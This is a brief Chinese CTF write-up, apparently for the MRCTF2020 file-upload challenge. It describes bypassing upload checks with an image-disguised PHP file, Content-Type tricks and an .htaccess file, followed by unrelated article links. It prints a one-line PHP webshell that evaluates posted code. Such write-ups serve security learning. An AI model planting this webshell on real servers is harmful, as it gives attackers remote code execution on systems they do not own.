知识点
文件上传:图片马&Content-Type验证&.htacess文件
信息收集
应该是考察文件上传,后端是php。
考虑到文件上传姿势比较多,如果一个个试很浪费时间,所以这里找了个php文件上传的字典
貌似是图片马可以,所以可以开始利用
利用过程
准备一张图片马,命名
<?php @eval($_POST['attack']) ?>
.htaccess文件
相关文章
- [MRCTF2020]你传你呢
- buuctf 你传你马呢
- 你有没有觉得邮件发送人固定配置在yml文件中是不妥当的呢?SpringBoot 动态设置邮件发送人
- 简单聊聊java主要的几种数据库连接池,你知道的有几种呢!!
- 为移动宽带正个名,并不是所有移动宽带都是NAT类型4,你的移动宽带是NAT几呢?
- 你对SPA单页面的理解,它的优缺点分别是什么?如何实现SPA应用呢?
- mac的safari浏览器调试h5 在h5开发移动端时,兢兢业业的开发的完成后,本地电脑测试,无bug,完美。在自己的新手机上测试,也没有bug,ok,交付。然而,在测试阶段,bug来了,这个按钮怎么点击无反应?这个样式怎么不对?。。。明明没有bug呀,难道又是兼容性问题?头疼,到底是什么原因呢。 这个时候加入你在mac的Safari 浏览器上稍加调试,问题就出现了,我们可以清晰的看到错误原因和报错信息。ok,那就解决问题了。具体怎么调试呢,看下方:
- 对于单例模式面试官会怎样提问呢?你又该如何回答呢?
- 25 个 Linux 下最炫酷又强大的命令行神器,你用过其中哪几个呢?
- 数组的遍历你都会用了,那Promise版本的呢